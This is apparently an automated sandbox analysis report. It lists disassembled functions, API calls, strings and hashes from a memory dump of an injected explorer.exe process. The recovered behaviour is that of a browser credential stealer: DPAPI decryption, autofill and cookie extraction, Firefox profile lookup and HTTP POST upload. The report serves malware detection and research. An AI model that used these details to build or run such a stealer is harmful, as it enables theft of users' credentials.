Part of subcall function 0297123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02973E4B,00000000), ref: 0297124A
Part of subcall function 0297123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971268
Part of subcall function 0297123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02973E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02973E9E

Strings

DPAP, xrefs: 02973E52
DPAP, xrefs: 02973E5A
, xrefs: 02973EA8
IDPAP, xrefs: 02973E6E, 02973E72

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: 12551eb676b80b7664e74af0154db651a8875991f59b7b223b66633ae7dd3681
Instruction ID: 032a9c64ac9449f571a9021d29a2644262e9c0f68d1558b880df7effd68bd9db
Opcode Fuzzy Hash: 12551eb676b80b7664e74af0154db651a8875991f59b7b223b66633ae7dd3681
Instruction Fuzzy Hash: 6021D272604345ABD725EE688880A7FB3DEAFC4704F4409AEF845D7200EF74C9499B96

Function 029D9247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2014011974.00000000029D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 029D7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_29d7000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821cf24f899591603e3a8d22e42fa6a537bd146c7f80bb7294e79dcce0d88396
Instruction ID: 0794da716044a547a17732cca0b99be884a4a2c1e9cff7b5c19d85aaaf5e27a5
Opcode Fuzzy Hash: 821cf24f899591603e3a8d22e42fa6a537bd146c7f80bb7294e79dcce0d88396
Instruction Fuzzy Hash: BEA14AB29547625FE721AF78CCC07A1BBA5EB42224B1C4B7CC9D5CB2C3E7A0640AD751

Function 02974B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02971162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0297116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02974BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 02974BBF

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: c1307e03e7171daa6e1e75963beaabd9f426c1a4a20df08605b78ae347100308
Instruction ID: 1f7734de057e8a480d707006b3c4ccecd327d9cc09e5f7a1b6cd7bdd07c18bfc
Opcode Fuzzy Hash: c1307e03e7171daa6e1e75963beaabd9f426c1a4a20df08605b78ae347100308
Instruction Fuzzy Hash: 4DE0D831905210A7C714BB30BC08B6F3B6EEFC1371F20C92DE159D2081CB318C508E50

Function 02971011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02971162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0297116F

GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 04fe16900560fce467e315a933f0a2332e43ab4b9615b1a200f28b978536663b
Instruction ID: f449b33fc74280be55b257cd135e1029bec9f57abadeb472b635c067881bf583
Opcode Fuzzy Hash: 04fe16900560fce467e315a933f0a2332e43ab4b9615b1a200f28b978536663b
Instruction Fuzzy Hash: E1C04C72D4926097CA6027A5790CBEA2B1DDF8A267F150881B509A7241CA65885187A1

Function 02976512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(029D20A4,00000001,00000000,0000000A,029C3127,029728DA,00000000,?), ref: 0297BFFC

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: cfb45a92911f1ddd9e8ee6ee69384f5e85b1a38415a384658b44281d07518c3a
Instruction ID: c4a869dbfc546c26218682f02b3dd20b6383e9c54caa30a8971c53cc9b298b70
Opcode Fuzzy Hash: cfb45a92911f1ddd9e8ee6ee69384f5e85b1a38415a384658b44281d07518c3a
Instruction Fuzzy Hash: 3FE01A32BC8B0035F72037F8AC06F5A165E4BC4F00FA08A15BB1DA90C9EBD58180BC26

Function 02973C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 02973C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973C76
DeleteFileW.KERNELBASE(00000000), ref: 02973C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02973D2F
lstrlen.KERNEL32(00000000), ref: 02973D36
wsprintfA.USER32 ref: 02973D55
lstrlen.KERNEL32(00000000), ref: 02973D61
lstrcat.KERNEL32(00000000,?), ref: 02973D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02973DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02973DED

Strings

AUTOFILL, xrefs: 02973DBD, 02973DC2, 02973DCC
SELECT name,value FROM autofill, xrefs: 02973CAA
%s = %s, xrefs: 02973D4F

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 705a14db3ddb55ffecfe2c1c75ffcfd284fd0ae0e6ba8c4e3e2726f017477022
Instruction ID: 9dc0ca25f63b7fa63ac4746fcda31ddba4011009b603b157f7eaaf63da58693a
Opcode Fuzzy Hash: 705a14db3ddb55ffecfe2c1c75ffcfd284fd0ae0e6ba8c4e3e2726f017477022
Instruction Fuzzy Hash: C841AD31608241ABD711AB75CC80E3F7BAEEFCA754F10486CF84AA7251DB35D8029B66

Function 029728F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02972AD2

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 029729E1
lstrlen.KERNEL32(00000000), ref: 029729EC
wsprintfA.USER32 ref: 02972A38
lstrlen.KERNEL32(00000000), ref: 02972A44
lstrcat.KERNEL32(00000000,00000000), ref: 02972A6C
lstrlen.KERNEL32(00000000,?,?), ref: 02972A99

Strings

FALSE, xrefs: 02972A06
TRUE, xrefs: 02972A13
COOKIES, xrefs: 02972AA4, 02972AAB, 02972AB1
%sTRUE%s%s%s%s%s, xrefs: 02972A32

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 7204196fca3e20d9a68583addbdec2b31fa8fb386ded9a64eb5ef24816488adc
Instruction ID: 423fb8f641657fdd6fd931e5f96a34824bb4f524057629e13a26e61748f64e47
Opcode Fuzzy Hash: 7204196fca3e20d9a68583addbdec2b31fa8fb386ded9a64eb5ef24816488adc
Instruction Fuzzy Hash: 76519030A083469BD729EF31D990A3F77EEAFC5745F04482DF8899B251DB35D8058B62

Function 02972CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02972D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 02972D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,029C637C,?,00000FFF,?), ref: 02972D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02972D7B
lstrlenW.KERNEL32(00000000), ref: 02972DD8

Strings

Profile, xrefs: 02972D3F
Path, xrefs: 02972D62
IsRelative, xrefs: 02972D75
profiles.ini, xrefs: 02972CCD

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 4d185cc22bd0fd1be427211af5ad4e04eb6f11182e5d1e8fc66def55034a1e96
Instruction ID: 7e7e331aeb80b361bce1b4db68b482d11d33102b9c09b908f3668b135c1204cb
Opcode Fuzzy Hash: 4d185cc22bd0fd1be427211af5ad4e04eb6f11182e5d1e8fc66def55034a1e96
Instruction Fuzzy Hash: 09319230F583429BD714AF70985063F77ABAFC9700F10482EED4AAB281DF758946DB52

Function 02971333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

Part of subcall function 0297106C: lstrlen.KERNEL32(02CF70DE,00000000,00000000,00000000,02971366,774C8A60,02CF70DE,00000000), ref: 02971074
Part of subcall function 0297106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02CF70DE,00000001,00000000,00000000), ref: 02971086

Part of subcall function 029712A3: RtlZeroMemory.NTDLL(?,00000018), ref: 029712B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 029713C2
wsprintfW.USER32 ref: 029714B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02971594

Strings

POST, xrefs: 02971465
Accept: */*Referer: %S, xrefs: 029714AF
Content-Type: application/x-www-form-urlencoded, xrefs: 029714FB

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: a1f9ef08776a23f69268c9c87c80defb5ee6957db8f90374c527ca8fbf710088
Instruction ID: bdd996bc492290b3248d924767d197a8ca54b9122ed9095133d9ee5cb594b5ac
Opcode Fuzzy Hash: a1f9ef08776a23f69268c9c87c80defb5ee6957db8f90374c527ca8fbf710088
Instruction Fuzzy Hash: 547136B1A08341AFD7149F68D884A2BBBEEEBC8355F10492DF999D3251DB70DA048B52

Function 0297B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0297B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0297B34F

Strings

winShmMap1, xrefs: 0297B278
winShmMap3, xrefs: 0297B399
winShmMap2, xrefs: 0297B2CF

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 712b5cd0960aebcbfee9f545f16737d77a73617ea5e03d6fb7b9d5598140b334
Instruction ID: 891e0a5bca5d7c31170faf7e02acc2099d0693999187ca19e70022225d4f611d
Opcode Fuzzy Hash: 712b5cd0960aebcbfee9f545f16737d77a73617ea5e03d6fb7b9d5598140b334
Instruction Fuzzy Hash: D951B271605701DFE725CF18C8A4A6B77EAFF94318F10892EE9868B290EB70E855CB51

Function 0297A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 0297A455
memcpy.NTDLL(?,?,?), ref: 0297A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 0297A4DB
memset.NTDLL ref: 0297A546

Strings

winRead, xrefs: 0297A515

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: 1c8fc59c67466b60cfef149f87a8d58a19df8bf98ac33690c3a334948e463d7d
Instruction ID: e5c4b434af31f84960b2b0764ca6fd20a5e77140ff7c364c890e804e6cab6e4b
Opcode Fuzzy Hash: 1c8fc59c67466b60cfef149f87a8d58a19df8bf98ac33690c3a334948e463d7d
Instruction Fuzzy Hash: 7B318972609341AFD750DE68CC849AFB7EAEFC8310F845928F99997250E731ED048B92

Function 02972E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(?,?), ref: 02972E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02972EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02972F54
RegCloseKey.KERNELBASE(?), ref: 02972F62

Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98

Part of subcall function 02971BC5: lstrlenW.KERNEL32(00000000,00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971BCC
Part of subcall function 02971BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02972E75,PathToExe,00000000,00000000), ref: 02971BF0
Part of subcall function 02971BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02972E75,PathToExe,00000000,00000000), ref: 02971C05
Part of subcall function 02971BC5: lstrlenW.KERNEL32(00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971C1C

Part of subcall function 02971AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02972E83,PathToExe,00000000,00000000), ref: 02971B16

Strings

PathToExe, xrefs: 02972E5E

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: fdb69995940fa37cb4bdc9b0ccadf34b6a617a35de2facc13acf7ae4569dc745
Instruction ID: 747d803070dcadb0054de66b4432ad5af547406cc11ee304a89408710d84bd47
Opcode Fuzzy Hash: fdb69995940fa37cb4bdc9b0ccadf34b6a617a35de2facc13acf7ae4569dc745
Instruction Fuzzy Hash: 17317E71A14211AF9B19AF21C804D7F7AAAEFC5750F04452CFC5997240EF34C906DFA1

Function 0297A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 0297A6AD
_allmul.NTDLL(00000000,?,?), ref: 0297A6B6
SetEndOfFile.KERNELBASE(?), ref: 0297A6F3

Strings

winTruncate1, xrefs: 0297A6DF
winTruncate2, xrefs: 0297A717

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 3568847005-470713972
Opcode ID: 6f85fe0286353d0bcf80a26ff621ed80e2ad59727c8f69d3cd6a636f3782e34a
Instruction ID: f05ad8fa19b91224c033e436e9eb0ecb4fe46d14a2cc4d80c226326558249345
Opcode Fuzzy Hash: 6f85fe0286353d0bcf80a26ff621ed80e2ad59727c8f69d3cd6a636f3782e34a
Instruction Fuzzy Hash: A121CD72601200ABDB148E6DCC94EAB77AEEFC4310F11856DFD08DB284D735E810CBA1

Function 02974A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

wsprintfW.USER32 ref: 02974AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02974AC7
RegCloseKey.KERNELBASE(?), ref: 02974AD4

Strings

%s\%08x, xrefs: 02974A9C
Software, xrefs: 02974A95

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 261bf6212797c48b862102ddb2a785762dc89ca95335d732ae0cf0ae173ff68a
Instruction ID: 1f9509a412630707e189d05386dc4e9eb2a739aec206fad3c79cb9c531bf0f33
Opcode Fuzzy Hash: 261bf6212797c48b862102ddb2a785762dc89ca95335d732ae0cf0ae173ff68a
Instruction Fuzzy Hash: 37014271A04008BFAB08DF84DC8ADBF77BDEB80354B50007EF505A3100EBB02E40A661

Function 02974317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 0297431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02974335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02974363
RegCloseKey.ADVAPI32(?), ref: 029743C8

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

Part of subcall function 0297418A: wsprintfW.USER32 ref: 02974212

Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 029743B9

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 2b48996f9b015f109b2a244e207ed826e4c5c1b7228c3dd1aeb3e10d5a8413dc
Instruction ID: 959361031ef6f1d7dfb6ffb7365fc0c49571a2943af64929b2363172d20690ab
Opcode Fuzzy Hash: 2b48996f9b015f109b2a244e207ed826e4c5c1b7228c3dd1aeb3e10d5a8413dc
Instruction Fuzzy Hash: 86113DB1508201AFE715DB21DC48DBF77EDEBC8354F004A2EB989E2150EB74AD589A62

Function 0297B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0297B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0297B96F

Strings

winOpen, xrefs: 0297BA22
psow, xrefs: 0297BA95

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: e8da2e7042635511c6b066b9c54573063a661a068d76318c58969f8aaf542bfe
Instruction ID: d50fed2e7a5a52f9440ea55de54717cb174673295009b60bfc706a053737dabc
Opcode Fuzzy Hash: e8da2e7042635511c6b066b9c54573063a661a068d76318c58969f8aaf542bfe
Instruction Fuzzy Hash: A7717F71A087029FD710EF29C89175ABBE5FF88728F104A2DF8A897280D774D954CF92

Function 029719E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98

Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 953dbd10ea63d10c9a5ac2910b3572241d18e4e2b44c249ea53033eff0dca767
Instruction ID: ba02f8a8d173de1a9574daa9ec71762b823c41989c883d2a5d0364849de75b4c
Opcode Fuzzy Hash: 953dbd10ea63d10c9a5ac2910b3572241d18e4e2b44c249ea53033eff0dca767
Instruction Fuzzy Hash: B521B5726093416FEB298A21DD04F7BB7EDEFC9B58F140A2DF98DA2140E721C9448731

Function 02971EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 02971ED5

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02971F0C
RegCloseKey.ADVAPI32(?), ref: 02971F98

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02971F82

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 3ada1bb496fd31945e45bfbd793a76ce63241292e2d1aaedd4f22cd80035262a
Instruction ID: 659e0020da7ba2a7001c605651eeec8b5ae955fa61cc5f6c0d2fab382eba2d7e
Opcode Fuzzy Hash: 3ada1bb496fd31945e45bfbd793a76ce63241292e2d1aaedd4f22cd80035262a
Instruction Fuzzy Hash: BD215971608341AFD7099B21DC48E3FBBEEEFC9354F00892DF899A2250DB75C9159B22

Function 02971C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02973E1E,00000000,?,02973FA8), ref: 02971C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,02973FA8), ref: 02971C56
CloseHandle.KERNELBASE(00000000,?,02973FA8), ref: 02971C91

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02973FA8), ref: 02971C76

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

